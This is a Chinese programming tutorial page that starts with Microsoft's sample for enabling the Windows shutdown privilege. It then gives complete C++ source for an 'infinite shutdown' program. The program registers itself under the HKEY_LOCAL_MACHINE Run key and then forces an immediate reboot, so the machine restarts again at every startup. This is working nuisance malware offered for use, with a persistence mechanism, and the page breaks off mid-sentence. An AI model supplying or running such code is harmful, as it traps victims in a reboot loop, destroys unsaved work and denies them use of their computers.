C/C++无限关机(提权例子)-C#.Net教程-PHP中文网

C/C++无限关机(提权例子)

黄舟

发布： 2017-01-22 14:23:26

原创

2083人浏览过

在windows系统中，当涉及本进程去操作其他进程，或者要用shutdown这些高危命令的时候就涉及提权，下面是msdn的列子

提权三兄弟
OpenProcessToken
LookupPrivilegevalue
AdjustTokenPrivileges

我们用下面这个MSDN的代码来做一个注册表无限关机的列子

#include <windows.h>  
  
#pragma comment(lib, "user32.lib")  
#pragma comment(lib, "advapi32.lib")  
  
BOOL MySystemShutdown()  
{  
   HANDLE hToken;   
   TOKEN_PRIVILEGES tkp;   
   
   // Get a token for this process.   
   
   if (!OpenProcessToken(GetCurrentProcess(),   
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))   
      return( FALSE );   
   
   // Get the LUID for the shutdown privilege.   
   
   LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,   
        &tkp.Privileges[0].Luid);   
   
   tkp.PrivilegeCount = 1;  // one privilege to set      
   tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;   
   
   // Get the shutdown privilege for this process.   
   
   AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,   
        (PTOKEN_PRIVILEGES)NULL, 0);   
   
   if (GetLastError() != ERROR_SUCCESS)   
      return FALSE;   
   
   // Shut down the system and force all applications to close.   
   
   if (!ExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE,   
               SHTDN_REASON_MAJOR_OPERATINGSYSTEM |  
               SHTDN_REASON_MINOR_UPGRADE |  
               SHTDN_REASON_FLAG_PLANNED))   
      return FALSE;   
  
   //shutdown was successful  
   return TRUE;  
}

登录后复制

上面是MSDN的代码，下面给出无限关机的代码(含详细注释)

立即学习“C++免费学习笔记（深入）”；

// shutdownDemo.cpp : 定义控制台应用程序的入口点。  
//  
  
#include "stdafx.h"  
#include <windows.h>  
  
BOOL MySystemShutdown()  
{  
    HANDLE hToken;      //用于操作的句柄  
    TOKEN_PRIVILEGES tkp;   //用于存放特定信息  
  
    // Get a token for this process.   
  
    if (!OpenProcessToken(GetCurrentProcess(),  
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))  
        return(FALSE);  
  
    // Get the LUID for the shutdown privilege.   
    //如果要提权的话要在下面这两个函数提权  
  
    LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,  
        &tkp.Privileges[0].Luid);  
  
    tkp.PrivilegeCount = 1;  // one privilege to set      
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;  
  
    // Get the shutdown privilege for this process.       
  
  
    AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,  
        (PTOKEN_PRIVILEGES)NULL, 0);  
  
    if (GetLastError() != ERROR_SUCCESS)  
        return FALSE;  
  
    // Shut down the system and force all applications to close.   
  
    if (!ExitWindowsEx(EWX_REBOOT| EWX_FORCE,  
        SHTDN_REASON_MAJOR_OPERATINGSYSTEM |  
        SHTDN_REASON_MINOR_UPGRADE |  
        SHTDN_REASON_FLAG_PLANNED))  
        return FALSE;  
  
    //shutdown was successful  
    return TRUE;  
}  
  
  
int _tmain(int argc, _TCHAR* argv[])  
{  
    getchar();  
    HKEY hKey = { 0 };  
  
    /*LONG RegOpenKeyEx( 
        HKEY hKey, // 需要打开的主键的名称 
        LPCTSTR lpSubKey, //需要打开的子键的名称 
        DWORD ulOptions, // 保留，设为0 
        REGSAM samDesired, // 安全访问标记，也就是权限 
        PHKEY phkResult // 得到的将要打开键的句柄 
        )*/  
  
    RegOpenKeyExA(HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows\CurrentVersion\Run",0,KEY_WRITE,&hKey);    //打开一个指定的注册表键  
    char path[MAX_PATH] = { 0 };  
    GetModuleFileNameA(nullptr, path, MAX_PATH);    //获取当前文件路径  
  
    RegSetValueEx(hKey, "ShutDown", 0, REG_SZ, (byte*)path, strlen(path));  
    MySystemShutdown();  
    return 0;  
}

登录后复制

如果出现下面问题